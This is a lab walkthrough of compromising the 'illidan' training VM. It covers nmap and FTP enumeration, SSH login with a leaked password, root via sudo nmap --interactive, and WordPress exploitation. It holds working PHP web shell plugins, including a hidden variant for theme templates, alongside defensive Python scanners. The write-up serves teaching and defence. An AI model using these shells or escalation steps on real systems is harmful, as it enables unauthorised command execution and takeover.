Pentesting: illidan

Review of what was learned in the #Pentesting4ever workshop

Given at the #Euskalhack computer security conference

The original write-up is here

Slides of the presentation

Contents:


1) Start the target machine, illidan, in VirtualBox

Note: I configure the network as a host-only adapter.

My VMs' network is 192.168.56.XX (this may differ on your machine; check with ip a | grep global)

em50l@jejo.es$ ip a |grep vbox
    inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0

Then I run nmap -sn 192.168.56.0/24 (or nmap -sn 192.168.56.*) to see what shows up:

em50l@jejo.es:~$ nmap -sn 192.168.56.*

Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-30 12:35 CEST
Nmap scan report for medion (192.168.56.1)
Host is up (0.00040s latency).
Nmap scan report for 192.168.56.103
Host is up (0.00056s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.32 seconds

Good. The IP is 192.168.56.103.




2) Enumeration: illidan (192.168.56.103)

Although it is not strictly necessary (making a lot of noise is not good), I'll look at the ports:
nmap -n 192.168.56.103 -p 1-1024

em50l@jejo.es$ nmap  192.168.56.103 -p 1-1024
Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-23 12:48 CEST
Nmap scan report for 192.168.56.103

PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Note on the first scan: I see FTP, SSH, HTTP, mail (POP3/IMAP, plain and over TLS) and Microsoft SMB.




As a second step I would run nmap 192.168.56.103 -sC (too much information at once),
so for the explanation it is better to go port by port.

2a) Enumeration: ftp

Manual mode: timeout 1 cat < /dev/tcp/192.168.56.103/21

em50l@jejo.es$ timeout 1 cat </dev/tcp/192.168.56.103/21
220 (vsFTPd 2.3.5)
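The /dev/tcp trick above is a one-port banner grab. As an added example (not part of the original write-up), here is the same idea in Python, generalised to a list of ports, with a timeout so silent services such as HTTP and SMB do not hang the sweep. The 192.168.56.103 target mentioned in the comments is only an example value; to run offline the block starts a constructed local listener that mimics the vsFTPd greeting.

```python
"""Banner grabbing: the Python equivalent of `timeout 1 cat < /dev/tcp/HOST/PORT`,
generalised to several ports. Services that speak first (FTP, SSH, POP3, IMAP,
SMTP) hand over their greeting before we send a byte; silent ones (HTTP, SMB)
just time out."""
import socket
import threading


def grab_banner(host, port, timeout=1.0, max_bytes=1024):
    """Connect, read what the server volunteers, return it as stripped text.
    Returns '' when the server is silent or refuses the connection, so a sweep
    over many ports never raises."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            chunks, total = [], 0
            while total < max_bytes:
                try:
                    data = s.recv(max_bytes - total)
                except socket.timeout:
                    break
                if not data:
                    break
                chunks.append(data)
                total += len(data)
                if b"\n" in data:          # one greeting line is enough
                    break
            return b"".join(chunks).decode("utf-8", errors="replace").strip()
    except OSError:
        return ""


def grab_banners(host, ports, timeout=1.0):
    """Map port -> banner ('' when silent) for each port."""
    return {p: grab_banner(host, p, timeout) for p in ports}


def parse_ftp_banner(banner):
    """Split an FTP greeting such as '220 (vsFTPd 2.3.5)' into (code, text).
    Anything that does not start with a 3-digit reply code gives (None, banner)."""
    if len(banner) >= 3 and banner[:3].isdigit():
        return int(banner[:3]), banner[3:].strip()
    return None, banner


def serve_banner_once(banner, host="127.0.0.1"):
    """Constructed stand-in for a target service, for offline runs: listen on a
    free local port, accept one client, send `banner`, close. Returns the port."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handler():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=handler, daemon=True).start()
    return port


if __name__ == "__main__":
    # Offline demo against a fake vsFTPd; on the lab VM you would call
    # grab_banners("192.168.56.103", [21, 22, 110, 143]).
    port = serve_banner_once(b"220 (vsFTPd 2.3.5)\r\n")
    for p, banner in grab_banners("127.0.0.1", [port]).items():
        print(f"{p}/tcp: {banner or '<no banner>'} -> {parse_ftp_banner(banner)}")
```

The SSH greeting ("SSH-2.0-OpenSSH_5.9p1 ...") comes back through the same function; only the FTP parser is specific, because FTP prefixes its line with a reply code.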

Using nmap: nmap 192.168.56.103 -sC -p 21

em50l@mipc:~$ nmap  192.168.56.103 -sC -p 21

Starting Nmap 7.60 ( https://nmap.org ) at 2019-06-23 13:01 CEST

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Jun 08 19:42 TODO
|_-rw-r--r--    1 0        0              26 Jun 08 19:40 secret.txt

vsFTPd 2.3.5 - secure, fast, stable

Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds

vsFTPd 2.3.5 and... Anonymous FTP login allowed (FTP code 230)!


Good. I connect to the FTP server anonymously: mc ftp://192.168.56.103
I use mc (Midnight Commander) to browse more quickly.

  Izquierdo     Archivo     Utilidades     Opciones     Derecho                    
┌<─ ftp://192.168.56.103/TODO ─────.[^]>┐┌<─ ftp://192.168.56.103/ ──────────.[^]>┐
.n    Nombre      Tamaño fecha Modifi││.n     Nombre      Tamaño fecha Modifi
/..               DIR-ANT 8 jun 19:42││/..                DIR-ANT20 jun 00:03
 migration.txt    │     60│ 8 jun 19:38││/TODO                 4096 8 jun 19:42
 pending.txt           55 8 jun 19:42││ .wp_back.bk       │     24│ 8 jun 19:39│
│                  │       │            ││ secret.txt             26 8 jun 19:40
│                  │       │            ││                   │       │            │
├───────────────────────────────────────┤├────────────────────────────────────────┤
│ migration.txt                         ││/TODO                                   │
└───────────────────────────────────────┘└────────────────────────────────────────┘

em50l@jejo.es:~$                                                                 [^]
 1Ayuda  2Menú   3Ver    4Editar 5Copiar  6RenMov 7Mkdir  8Borrar 9Menú   10Salir

(animated gif: browsing the FTP files with mc)

  • I see there is a hidden file (.wp_back.bk) with a possible password, eUSk4l_99%, but I don't know the user.
    A glance at the blog (curl 192.168.56.103 | grep author) shows that one author is sean.
    Let's check for username/password reuse:
    I try ssh sean@192.168.56.103 with password eUSk4l_99% (taken from the file we saw via FTP)
em50l@mipc:~$ ssh sean@192.168.56.103 
sean@192.168.56.103's password: eUSk4l_99%
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic x86_64)
.
Last login: Sun Jun 21 12:28:28 2019 from 192.168.56.1
sean@illidan:~$ #  User-level access obtained! We continue in the privilege escalation section
Another way (using sshpass to pass the password): `sshpass -p 'eUSk4l_99%' ssh sean@192.168.56.103`. This can be useful if I need to write a custom script.
em50l@jejo.es$ sshpass -p 'eUSk4l_99%' ssh sean@192.168.56.103 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic x86_64)
....
sean@illidan:~$ #  User-level access obtained! We continue in the privilege escalation section

Tip:
To read the web page from the console you can use curl with a filter that strips HTML tags: curl -s 192.168.56.103 | sed 's/<[^>]*>//g'

Tip: to see the blog's authors: curl -s 192.168.56.103 | grep author





2b) Enumeration: ssh

I try ssh -v, which shows the protocol and gets me the versions.

em50l@jejo.es~$ ssh root@192.168.56.103 -v
OpenSSH_7.6p1 Ubuntu-4ubuntu0.3, OpenSSL 1.0.2n  7 Dec 2017
debug1: Connection established.
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4
debug1: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000000
root@192.168.56.103's password: 

The remote sshd version is OpenSSH_5.9p1 Debian-5ubuntu1.4 (the OpenSSH_7.6p1 Ubuntu-4ubuntu0.3, OpenSSL 1.0.2n line is our own client).

I try to enumerate users (I create a file, usuarios, with the names gathered so far).

msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file usuarios
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.56.103
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.56.103:22 - SSH - Using malformed packet technique
[*] 192.168.56.103:22 - SSH - Starting scan
[-] 192.168.56.103:22 - SSH - User 'cocinitas' not found
[+] 192.168.56.103:22 - SSH - User 'sean' found
[+] 192.168.56.103:22 - SSH - User 'root' found
[-] 192.168.56.103:22 - SSH - User 'illidan' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I see that the users sean and root exist on the machine (the module confirms the accounts exist; it says nothing about whether password login is permitted for them). The malformed-packet check relies on the OpenSSH username enumeration bug CVE-2018-15473, which affects OpenSSH up to 7.7; the target's 5.9p1 is in range.
Note: SSH user enumeration does not always work.





2c) Enumeration: http

em50l@jejo.es~$ nmap  192.168.56.103 -p 80 --script http-enum
Nmap scan report for 192.168.56.103

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /wp-login.php: Wordpress login page.
|_  /readme.html: WordPress version 4.6.6

em50l@jejo.es~$ curl -vs http://192.168.56.103 | grep server
> 
< HTTP/1.1 200 OK
< Date: Sun, 21 Jul 2019 13:57:17 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.3.10-1ubuntu3.26




2d) Enumeration: smb

msf5 > use auxiliary/scanner/smb/smb_enumusers
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 192.168.56.103:139    - ILLIDAN [ nobody, sean ] ( LockoutTries=0 PasswordMin=5 )
[*] 192.168.56.103:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_enumusers) > 

I get a username: sean






4) Privilege escalation.

I try ssh sean@192.168.56.103 with password eUSk4l_99% (taken from the file we saw via FTP)

em50l@mipc:~$ ssh sean@192.168.56.103
sean@192.168.56.103's password: eUSk4l_99%
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic x86_64)
.
Last login: Sun Jun 21 12:28:28 2019 from 192.168.56.1
sean@illidan:~$ #  User-level access obtained! Now for the privilege escalation

The easy method.
I check whether sean may run nmap through sudo (sudo -l lists what is allowed) and whether that nmap is an old version with --interactive, whose ! escape runs shell commands as root.
If screen is also available, it's a piece of cake.

sean@illidan:~$ sudo nmap --interactive

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !screen

Screen version 4.00.03jw4 (FAU) 2-May-06

root@illidan:~# 

Indeed, I now have a root shell: nmap runs as root under sudo, so the !screen escape spawns a root shell.
This deserves a closer look; there are surely more ways to escalate.
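The check a practitioner wants before (or after) trying sudo nmap --interactive is sudo -l: what exactly may sean run as root, and does any of it offer a shell escape? Below is an added example, not from the original write-up, that parses sudo -l output and flags such binaries. The SAMPLE_SUDO_L text is constructed in the layout sudo prints, not captured from illidan, and the escape table is a short hand-picked list to extend from a reference such as GTFOBins.

```python
"""Triage of `sudo -l` output: which of the commands a user may run as root are
known to offer a shell escape? nmap's old --interactive mode (!cmd) and screen
are the two used above; the table lists a few more well-known ones."""
import re

# Binaries with a documented way to spawn a shell when run as root.
# Short, explicit list; extend it from a reference such as GTFOBins.
SHELL_ESCAPES = {
    "nmap": "nmap --interactive, then !sh (old nmap releases only)",
    "screen": "screen spawns a shell directly",
    "vim": ":!sh or :shell",
    "vi": ":!sh",
    "less": "!sh from the pager",
    "more": "!sh from the pager",
    "man": "!sh from the pager",
    "find": "find . -exec /bin/sh \\; -quit",
    "awk": "awk 'BEGIN {system(\"/bin/sh\")}'",
    "python": "python -c 'import os; os.system(\"/bin/sh\")'",
    "perl": "perl -e 'exec \"/bin/sh\"'",
    "env": "env /bin/sh",
    "bash": "it is a shell",
    "sh": "it is a shell",
}

# One rule line: "(root) NOPASSWD: /usr/bin/nmap, /usr/bin/screen"
_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return [(runas_user, nopasswd, command), ...] from the command section of
    `sudo -l` output, one entry per comma-separated command."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = _RULE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(root)" or "(ALL : ALL)"
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((runas, nopasswd, cmd.strip()))
    return rules


def find_escapes(rules):
    """Flag rules that run as root (or ALL) and whose binary is in SHELL_ESCAPES,
    plus the catch-all 'ALL'. Returns a list of dicts."""
    hits = []
    for runas, nopasswd, cmd in rules:
        if runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            hits.append({"cmd": cmd, "runas": runas, "nopasswd": nopasswd,
                         "why": "unrestricted sudo: any command as root"})
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]       # /usr/bin/nmap -> nmap
        if binary in SHELL_ESCAPES:
            hits.append({"cmd": cmd, "runas": runas, "nopasswd": nopasswd,
                         "why": SHELL_ESCAPES[binary]})
    return hits


# Constructed sample in the layout sudo prints; not captured from illidan.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sean on illidan:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User sean may run the following commands on illidan:
    (root) NOPASSWD: /usr/bin/nmap, /usr/bin/screen
    (root) /usr/bin/tail
    (www-data) /usr/bin/vim
"""

if __name__ == "__main__":
    for hit in find_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        auth = "NOPASSWD" if hit["nopasswd"] else "password required"
        print(f"{hit['cmd']} as {hit['runas']} ({auth}): {hit['why']}")
```

Rules that run as a non-root user (the www-data vim line in the sample) are skipped on purpose: they may still be interesting for lateral movement, but they do not give root.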





- WordPress URL problem (the edits below set WordPress's home and site URL so the blog's links resolve on this lab IP, following the linked WordPress article)

https://wordpress.org/support/article/changing-the-site-url/


nano /var/www/wp-config.php

<?php
define('WP_HOME','/');
define('WP_SITEURL','/');
//define('WP_HOME','http://192.168.56.103/');
//define('WP_SITEURL','http://192.168.56.103/');


nano /var/www/wp-content/themes/twentyfourteen/functions.php

<?php
update_option( 'siteurl', '/');
update_option( 'home', '/');
//update_option( 'siteurl', 'http://192.168.56.103/');
//update_option( 'home', 'http://192.168.56.103/');




3a) Exploitation: shell from WordPress

The WordPress version is 4.6.6.
I search for "WordPress 4.6.6 shell" to see what comes up.
You can also use Yertle (see below).

I go to the admin interface, Plugins > Add New, and upload a zip with the .php inside.
Note that WordPress creates a folder named after the .zip.
The file uploads, but activating it gives an error.
Apparently it doesn't work. Activation fails because the file has no plugin header; the extracted file is nonetheless already reachable by URL under wp-content/plugins/:

http://192.168.56.103/wp-content/plugins/wp_shell/
http://192.168.56.103/wp-content/plugins/wp_shell/shell.php

Let's try with... https://github.com/danielmiessler/SecLists/tree/master/Web-Shells

It seems the plugins found on the internet don't work (which makes sense: WordPress refuses to activate a file without a "Plugin Name:" header).

I build a simple one myself:

<?php
echo "Em50L plugin <br>\n";
echo '<pre> ';
system($_REQUEST['cmd']);
echo '</pre>';
?>

I evolve it a bit (so that some information shows up in WP).
3rd evolution

<?php
    /*
    Plugin Name: Wordpress Shell Em50L
    Plugin URI: http://jejo.es
    Description: ejecuta comandos en el servidor
    Author: jejo Em50L
    */
//echo "<!-- \n\n"; // Uncomment this line to hide the output inside an HTML comment
echo "Em50L plugin <br>\n";
echo '<form action="em50l_shell.php"><input type="text" name="cmd"></form>';
echo '<pre>';
echo dirname(__FILE__)."\n";
print_r($_REQUEST);
if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']);}
echo '</pre>';
echo "<!-- --> \n\n";
?>

Here is a screenshot showing how the shell is called.

4th evolution, hidden mode: the output is only visible in the page source (view source).
The plugin can be activated and would then work from any page.
This code would also work in the theme's 404.php.

<?php
    /*
    Plugin Name: Wordpress Shell Em50L
    Plugin URI: http://jejo.es
    Description: ejecuta comandos en el servidor
    Author: jejo Em50L
    */
echo "<!-- Em50L plugin \n\n" ;
if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); }
echo "<!-- --> \n";
?>

Screenshots of the hidden shell inserted into the theme's archive template.
PoC of running cat /etc/*release through it.
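The shells above share one shape: a command-execution sink fed straight from a request superglobal, sometimes with the output tucked inside an HTML comment. As an added example (not the author's code), here is a small static triage script for that pattern, the kind of check you would run over wp-content/plugins/ and the theme directory after an engagement or during incident response. The three PHP samples are constructed for the demo; SHELL_A mirrors the minimal shell shown above.

```python
"""Static triage for PHP web shells of the kind built above: a command-execution
sink (system, exec, shell_exec, passthru, popen, proc_open, eval, assert,
backticks) whose argument comes, directly or through one assignment, from a
request superglobal ($_REQUEST/$_GET/$_POST/$_COOKIE). Also notes when the
file wraps its output in an HTML comment, the 'hidden mode' trick above."""
import re

SINKS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
SOURCES = r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER)\s*\["

# sink( ... $_REQUEST['x'] ... )  -- source used straight inside the call
DIRECT = re.compile(rf"\b{SINKS}\s*\([^;]*{SOURCES}", re.I)
# $var = $_REQUEST['x'];  ...  sink($var)
ASSIGN = re.compile(rf"(\$\w+)\s*=\s*{SOURCES}", re.I)
BACKTICK = re.compile(rf"`[^`]*{SOURCES}", re.I)
HTML_COMMENT_WRAP = re.compile(r"<!--")


def scan_php(source):
    """Return a list of (kind, detail) findings for one PHP file's text.
    An empty list means nothing matched."""
    findings = []
    for m in DIRECT.finditer(source):
        findings.append(("direct", m.group(0).split("(")[0].strip()))
    tainted = {m.group(1) for m in ASSIGN.finditer(source)}
    for var in sorted(tainted):
        if re.search(rf"\b{SINKS}\s*\([^;]*{re.escape(var)}\b", source, re.I):
            findings.append(("via-variable", var))
    if BACKTICK.search(source):
        findings.append(("backtick", "`...`"))
    if findings and HTML_COMMENT_WRAP.search(source):
        findings.append(("hidden-output", "<!-- ... -->"))
    return findings


def has_plugin_header(source):
    """WordPress only lists/activates a plugin whose main file carries a
    'Plugin Name:' header comment; a bare web shell lacks it (hence the
    activation error above) but is still reachable by URL once extracted."""
    return re.search(r"^\s*\*?\s*Plugin Name\s*:", source, re.I | re.M) is not None


# Constructed samples. SHELL_A mirrors the minimal shell shown above; LEGIT is a
# harmless plugin stub whose system() call takes a constant.
SHELL_A = """<?php
echo '<pre>';
system($_REQUEST['cmd']);
echo '</pre>';
?>"""

SHELL_B = """<?php
/*
Plugin Name: Innocent Looking Plugin
*/
$c = $_POST['q'];
echo "<!-- debug\\n";
passthru($c);
echo "-->";
?>"""

LEGIT = """<?php
/*
Plugin Name: Disk Usage Widget
*/
function du_widget() { return system('df -h'); }
?>"""

if __name__ == "__main__":
    for name, src in [("SHELL_A", SHELL_A), ("SHELL_B", SHELL_B), ("LEGIT", LEGIT)]:
        header = "header" if has_plugin_header(src) else "no header"
        print(name, header, scan_php(src))
```

This is pattern matching, not a parser: obfuscated shells (base64 bodies, variable functions, string concatenation) will slip past it, which is exactly why the hidden-mode variant above is worth knowing about when reviewing a compromised theme.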





WordPress scan: wpscan.

root@kali:~# wpscan --url http://192.168.56.103
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.5.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.103/

Interesting Finding(s):

[+] http://192.168.56.103/
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3.26
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.56.103/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.56.103/readme.html
[+] Upload directory has listing enabled: http://192.168.56.103/wp-content/uploads/
[+] http://192.168.56.103/wp-cron.php
[+] WordPress version 4.6.6 identified (Insecure, released on 2017-05-16).
 |
 | [!] 27 vulnerabilities identified:
 |
 | [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8807
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8905
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
 |
 | [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
 |     Fixed in: 4.7.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8906
 |      - https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
 |      - https://wpvulndb.com/vulnerabilities/8905
 |
 | [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41398
 |
 | [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41457
 |
 | [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41448
 |
 | [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
 |     Fixed in: 4.6.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8914
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
 |      - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/changeset/41395
 |      - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.6.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.6.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.6.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.6.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.6.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.6.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.6.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.6.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
